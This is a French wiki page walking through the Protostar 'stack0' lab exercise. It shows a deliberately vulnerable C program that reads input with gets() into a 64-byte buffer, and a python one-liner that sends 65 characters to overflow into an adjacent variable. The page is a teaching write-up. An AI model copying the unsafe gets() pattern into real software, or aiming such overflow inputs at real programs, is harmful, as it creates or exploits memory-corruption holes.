Outils d'utilisateurs
exploit_exercises_protostar:stack0
Stack 0
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } }
Ici le but est simple, il est simplement d'écrire par dessus la variable modified. Pour cela, rien de plus simple, si on met plus de 64 caractères dans buffer, les caractères en trop vont déborder sur la variable modified.
user@protostar:/opt/protostar/bin$ python -c 'print "A"*64' | ./stack0 Try again? user@protostar:/opt/protostar/bin$ python -c 'print "A"*65' | ./stack0 you have changed the 'modified' variable
exploit_exercises_protostar/stack0.txt · Dernière modification: 2017/04/09 15:33 (modification externe)
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
